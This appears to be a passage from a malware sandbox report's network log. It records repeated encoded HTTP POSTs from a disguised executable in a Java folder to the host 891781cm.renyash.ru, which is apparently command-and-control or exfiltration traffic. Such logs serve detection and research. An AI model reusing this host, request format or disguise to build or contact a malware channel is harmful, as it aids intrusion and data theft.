                                                                                                                  128192.168.2.450135104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:43.297097921 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:43.650310040 CET1796OUTData Raw: 55 5e 58 51 5f 59 51 5e 55 5a 54 59 51 5c 55 5c 58 5f 5c 5a 59 50 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^XQ_YQ^UZTYQ\U\X_\ZYPR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]+"#(>%=%Y>_$=9(\%/' /4_<0><#^!'^)
                                                                                                                  Jan 1, 2025 15:03:43.816695929 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:44.072088957 CET957INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkfO1XVelpVvBQJQbydtHaX9APHzyi9innhAiX0wUUcexI1%2BLR%2BFSCdQxIB2RyZk%2Bfs5bkioqOdwyTkavx%2F3kw6mWCramY4xM7D%2B4Ft9lyDEYNy1wzGYw2uupP1GB4Ee50RViNID"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dee883dc420-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3753&min_rtt=1461&rtt_var=5133&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=73722&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 21 0f 33 28 34 06 3c 2d 2a 5b 3b 3f 2f 55 25 2c 26 5d 30 30 38 1d 31 3d 35 5c 2f 38 23 02 3e 2b 0e 02 32 3a 25 5a 37 08 35 04 31 36 2e 5d 04 1d 25 5b 3d 04 25 07 3f 01 31 5b 3e 32 23 00 24 19 05 5a 26 42 2c 5d 30 5b 26 11 22 54 20 0d 27 30 2f 0f 2a 3a 2c 07 33 03 2e 57 20 2a 2e 57 0d 12 21 0d 24 3d 39 57 28 21 2c 54 20 2c 2f 56 25 3f 37 13 30 3f 3c 51 20 2b 2d 0d 29 3f 33 01 23 27 3d 12 27 2a 23 58 22 00 25 10 22 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!3(4<-*[;?/U%,&]0081=5\/8#>+2:%Z7516.]%[=%?1[>2#$Z&B,]0[&"T '0/*:,3.W *.W!$=9W(!,T ,/V%?70?<Q +-)?3#'='*#X"%"3"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  129192.168.2.450136104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:43.419739962 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:43.775266886 CET1064OUTData Raw: 55 52 5d 54 5a 5c 54 5a 55 5a 54 59 51 5b 55 54 58 5f 5c 54 59 52 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UR]TZ\TZUZTYQ[UTX_\TYRRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y<-Z41X2:(.&4%,';3Y>W$,?,,_<-<U)<#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:43.888803959 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:44.147690058 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iefMmNs8gBXDpwEQ3dKuSrls7e7PuaaHltWsCM1IQ0rC39%2BVAqM%2FNGTC2tWfzyYxZy122h1371Mzw6q1Zm3BHH%2FPDsiH8pCfmoPnHA1ACvIJAhhTbU2Wz%2FisQsdHds1xgYR9dbop"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30def0e56438b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4438&min_rtt=1943&rtt_var=5719&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1408&delivery_rate=66648&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  130192.168.2.450137104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:44.293665886 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:44.650079012 CET1064OUTData Raw: 55 54 58 56 5a 5c 54 5d 55 5a 54 59 51 5b 55 53 58 53 5c 5d 59 55 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXVZ\T]UZTYQ[USXS\]YURX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X?1X72)>?Y'1:B$0.V$,<->^<- *<#^!'^)?
                                                                                                                  Jan 1, 2025 15:03:44.801189899 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:45.077981949 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DjUBBbS4ZMguq0nsIAr1ts53pLl41mVLw5ybA0jF3RyRiVyiYJD2x%2B05DqdFB6o5LWTUD2CmlueRNWQMrZfY9y39RIsxuubEBiPxAuXJPvv7QlRHAyIoM%2BjwGLcYA170EbEOETlS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30df4ae8280cd-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=19908&min_rtt=14999&rtt_var=15444&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1384&delivery_rate=26899&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  131192.168.2.450138104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:45.302001953 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:45.650285006 CET1072OUTData Raw: 50 54 5d 56 5a 5f 51 5d 55 5a 54 59 51 5e 55 5d 58 5d 5c 5d 59 54 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PT]VZ_Q]UZTYQ^U]X]\]YTR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#()Z ]>1=6*>^'7-.#0,10Z8,[==7)#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:45.748789072 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:46.026624918 CET800INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ub6LXQ5RhjFaSaO5ewQBtJNeCVtkA3qMt22IsaTs12pc5e8EkDQuWmq76gjmHCqBvMgOY7aCgEALyWjYYrORnOLN1NPYEGaXKjocsP3VYOEy8oH22GGGexd7CE1zJxVDw2E%2B1omv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dfaac1f42b1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4075&min_rtt=1679&rtt_var=5422&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=70027&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  132192.168.2.450139104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:46.201767921 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:46.556404114 CET1072OUTData Raw: 55 55 5d 50 5f 5d 51 58 55 5a 54 59 51 58 55 56 58 53 5c 58 59 51 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UU]P_]QXUZTYQXUVXS\XYQRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^+7%X&=>/Y3$9$Y60/. \+=(S*,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:46.649022102 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:46.824738979 CET814INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aOyccrSCDAuhgZm%2Fj%2BoMd9tQEP6zEpuYqdyT4%2FYRpCLJPkc7cvlusquRo%2Fo%2BLUMhXtuCUWYGwLd7jIKtmZtm%2F38Yle%2FfKRWl0grnaEzxrOJPAz0xWaUOlzfJ12Bzmtl%2BYP9f0Os5"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e004e44437b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1770&rtt_var=699&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=763997&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  133192.168.2.450140104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:46.954082012 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:47.306441069 CET1072OUTData Raw: 50 56 58 56 5f 5b 51 5c 55 5a 54 59 51 5c 55 56 58 53 5c 55 59 56 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXV_[Q\UZTYQ\UVXS\UYVR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<,!78>$=%X) '"T:_%/$Z 8-8]=. R)<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:47.417375088 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:47.596138954 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mqwh9xmBr33p0kZvMGegF0OG0ScJdP%2BCBpxwLpGiri12RfTCBXeebDMz3tvRTiACsRCFaeu8FWm3gXC1r6vh2oc%2Fj0%2Bf%2FHW2uG6gLypwXcCvUA0sQYo1ndzbdBaPIB%2BSCyPnoCi%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e050f9e333c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3354&min_rtt=1971&rtt_var=3506&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=111971&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  134192.168.2.450141104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:47.715342999 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:48.072340012 CET1072OUTData Raw: 50 54 58 5d 5f 5c 51 55 55 5a 54 59 51 58 55 55 58 53 5c 5d 59 5c 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PTX]_\QUUZTYQXUUXS\]Y\R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?!4[$>>$3-#%,-$/X8>7(+><#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:48.314300060 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:48.489381075 CET802INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fo33UWI3mXlhkBr1gsQX4ZmXH6PkxHBKIBzwyop72HCMM4fyS2oDdzFMBPjaXsDQ64ArWaFl8%2FsbNf7c1otLpiwAOVOCnui2NbmaYRpmpw0D6agGicXgdqDbn5k0PFsDuawbC5zS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e0a6c9b4374-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=38921&min_rtt=31269&rtt_var=27030&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=15786&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  135192.168.2.450142104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:48.767821074 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  136192.168.2.450143104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:49.100397110 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1772
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:49.447040081 CET1772OUTData Raw: 55 50 58 54 5a 5a 51 5b 55 5a 54 59 51 5c 55 53 58 52 5c 55 59 56 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UPXTZZQ[UZTYQ\USXR\UYVR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X<"4;2%5]*+X'U-$_'?&0<;; ]+R*#^!'^)
                                                                                                                  Jan 1, 2025 15:03:49.546377897 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:49.725451946 CET955INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ErVbU8bNcg7XoReymhWw9uEqQ299Eaq2d2y5ByukMqoA%2BztJb3D85lH4MSxCaXyArHU6GT%2BTPmFT6y1cMy4ojU0xDSyEaN4%2Bqt5dzz%2BhHCGgPE1mFkgASUrXLYuVRwaD2DIF3xk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e125edf8c4d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4430&min_rtt=1964&rtt_var=5669&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2116&delivery_rate=67296&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 21 09 27 05 38 04 2b 3e 29 01 2f 3f 37 51 31 2f 26 1a 27 1e 3b 01 31 2d 3e 05 3a 38 24 5a 3f 28 33 5b 25 04 0f 5a 21 21 22 12 32 36 2e 5d 04 1d 25 5b 2a 2a 29 00 2b 2c 39 5f 2a 31 2f 05 27 27 0d 59 26 1a 20 13 33 2d 07 05 21 1c 20 0d 27 55 2f 0e 3c 07 3b 12 33 2d 03 08 20 00 2e 57 0d 12 21 0d 24 3d 36 0a 29 21 27 0c 21 2c 33 52 27 06 37 56 27 2c 38 1d 20 28 22 53 3e 3c 38 5a 22 24 35 54 27 04 3b 59 21 29 26 02 22 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!'8+>)/?7Q1/&';1->:8$Z?(3[%Z!!"26.]%[**)+,9_*1/''Y& 3-! 'U/<;3- .W!$=6)!'!,3R'7V',8 ("S><8Z"$5T';Y!)&"3"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  137192.168.2.450144104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:49.417026043 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
